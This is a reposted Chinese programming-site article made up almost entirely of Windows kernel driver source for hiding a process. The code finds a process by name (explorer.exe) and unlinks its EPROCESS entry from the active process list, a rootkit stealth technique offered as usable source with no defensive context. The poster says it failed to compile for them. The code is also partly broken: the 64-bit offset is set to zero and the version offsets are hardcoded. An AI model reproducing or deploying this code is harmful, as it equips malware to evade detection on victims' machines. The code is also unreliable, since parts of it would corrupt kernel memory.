當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

内核隐藏进程（源码）

發(fā)布時間：2024/4/11 编程问答 27 豆豆

生活随笔收集整理的這篇文章主要介紹了内核隐藏进程（源码）小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

自己測試的時候編譯失敗了，提示是這個PsGetProcessImageFileName API找不到鏈接庫，目測可能是我的DDK版本不夠新，先記錄下，改天再升級ddk做測試。

#include?<ntifs.h>??

#include?<ntddk.h>??

#include?<Ntstrsafe.h>??

NTKERNELAPI?UCHAR?*PsGetProcessImageFileName(PEPROCESS?Process);??

#ifndef?MAX_PATH??

#define?MAX_PATH??????????260??

#endif??

DWORD???????????????????g_OsVersion;????????????????????????????????????????????//系統(tǒng)版本????

????????????????????????????????????????????????????????????????????????????????//操作系統(tǒng)版本????

#define?WINXP???????????????????51????

#define?WIN7????????????????????61????

#define?WIN8????????????????????62????

#define?WIN81???????????????????63????

#define?WIN10???????????????????100????

????????????????????????????????????????????????????????????????????????????????//獲取系統(tǒng)版本????

BOOLEAN?GetOsVer(void);??

ULONG_PTR?EprocessActiveProcessLinks;??

//獲取ActiveProcessLinks??

ULONG_PTR?GetEprocessActiveProcessLinks();??

//隱藏進程??

NTSTATUS?HideProcess(ULONG?Processid);??

//獲取進程Processid??

ULONG?GetProcessProcessid(char*?pProcessName);??

VOID?DriverUnload(IN?PDRIVER_OBJECT?DriverObject)??

{??

????return;??

}??

NTSTATUS?DriverEntry(IN?PDRIVER_OBJECT?DriverObject,?IN?PUNICODE_STRING?RegistryPath)??

{??

????NTSTATUS?status;??

????DriverObject->DriverUnload?=?DriverUnload;??

????DbgBreakPoint();??

????HideProcess(GetProcessProcessid("explorer.exe"));??

????return?STATUS_SUCCESS;??

}??

//隱藏進程??

NTSTATUS?HideProcess(ULONG?Processid)??

{??

????//定義變量??

????KIRQL?Kirql;??

????PLIST_ENTRY?plistprocsTarge?=?NULL;??

????PLIST_ENTRY?plistprocsSource?=?NULL;??

????NTSTATUS?status;??

????PEPROCESS?Process?=?NULL;??

????//參數(shù)效驗??

????if?(Processid?<=?4)return?STATUS_UNSUCCESSFUL;??

????//獲取系統(tǒng)??

????if?(GetOsVer()?==?FALSE)return?STATUS_UNSUCCESSFUL;??

????//獲取ActiveProcessLinks??

????if?(EprocessActiveProcessLinks?==?NULL)??

????{??

????????EprocessActiveProcessLinks?=?GetEprocessActiveProcessLinks();??

????????if?(EprocessActiveProcessLinks?==?NULL)return?STATUS_UNSUCCESSFUL;??

????}??

????//獲取PEPROCESS??

????status?=?PsLookupProcessByProcessId(Processid,?&Process);??

????if?(NT_SUCCESS(status))??

????{??

????????plistprocsSource?=?(PLIST_ENTRY)((ULONG_PTR)Process?+?EprocessActiveProcessLinks);??

????????Kirql?=?KeRaiseIrqlToDpcLevel();??

????????//*((PULONG_PTR)plistprocsSource->Blink)?=?(ULONG_PTR)plistprocsSource->Flink;??

????????//*((PULONG_PTR)plistprocsSource->Flink?+?1)?=?(ULONG_PTR)plistprocsSource->Blink;??

????????RemoveEntryList(plistprocsSource);??

????????InitializeListHead(plistprocsSource);??

????????KeLowerIrql(Kirql);??

????????ObfDereferenceObject(Process);??

????}??

????return?status;??

}??

//獲取ActiveProcessLinks??

ULONG_PTR?GetEprocessActiveProcessLinks()??

{??

????//_EPROCESS???

#ifdef?_WIN64??

????EprocessActiveProcessLinks?=?0x00;??

#else??

????switch?(g_OsVersion)??

????{??

????case?WINXP:??

????????EprocessActiveProcessLinks?=?0x088;??

????????break;??

????case?WIN7:??

????case?WIN8:??

????case?WIN81:??

????case?WIN10:??

????????EprocessActiveProcessLinks?=?0x0b8;??

????????break;??

????default:??

????????break;??

????}??

#endif??

????return?EprocessActiveProcessLinks;??

}??

//獲取進程Processid??

ULONG?GetProcessProcessid(char*?pProcessName)??

{??

????//參數(shù)效驗??

????if?(MmIsAddressValid(pProcessName)?==?FALSE)return?NULL;??

????//定義變量??

????PEPROCESS?pEprocess?=?NULL;??

????NTSTATUS?ntstatus?=?STATUS_SUCCESS;??

????UCHAR?*szProcessName?=?NULL;??

????ULONG???Processid?=?0;??

????for?(int?i?=?4;?i?<?10000;?i?=?i?+?4)?//一般來說沒有超過100000的PID和TID??

????{??

????????//進程ID和返回一個引用指針的過程EPROCESS結構??

????????ntstatus?=?PsLookupProcessByProcessId((HANDLE)i,?&pEprocess);??

????????if?(NT_SUCCESS(ntstatus))//STATUS_INVALID_CID??

????????{??

????????????if?(pEprocess?!=?NULL)??

????????????{??

????????????????//比較進程名??

????????????????szProcessName?=?PsGetProcessImageFileName(pEprocess);??

????????????????if?(szProcessName)??

????????????????{??

????????????????????if?(_stricmp((char*)szProcessName,?pProcessName)?==?0)??

????????????????????{??

????????????????????????ObfDereferenceObject(pEprocess);??

????????????????????????return?(HANDLE)i;??

??????????????????????????

????????????????????}??

????????????????}??

????????????}??

????????????ObfDereferenceObject(pEprocess);??

????????}??

????}??

????return?NULL;??

}??

//獲取系統(tǒng)版本????

BOOLEAN?GetOsVer(void)??

{??

????ULONG????dwMajorVersion?=?0;??

????ULONG????dwMinorVersion?=?0;??

????PsGetVersion(&dwMajorVersion,?&dwMinorVersion,?NULL,?NULL);??

????if?(dwMajorVersion?==?5?&&?dwMinorVersion?==?1)??

????????g_OsVersion?=?WINXP;??

????else?if?(dwMajorVersion?==?6?&&?dwMinorVersion?==?1)??

????????g_OsVersion?=?WIN7;??

????else?if?(dwMajorVersion?==?6?&&?dwMinorVersion?==?2)??

????????g_OsVersion?=?WIN8;??

????else?if?(dwMajorVersion?==?6?&&?dwMinorVersion?==?3)??

????????g_OsVersion?=?WIN81;??

????else?if?(dwMajorVersion?==?10?&&?dwMinorVersion?==?0)??

????????g_OsVersion?=?WIN10;??

????else??

????{??

????????g_OsVersion?=?0;??

????????KdPrint(("未知版本"));??

????????return?FALSE;??

????}??

????return?TRUE;??

} ?

總結

以上是生活随笔為你收集整理的内核隐藏进程（源码）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇： EXE和SYS通信IOCTL方式
下一篇：隐藏驱动模块(源码)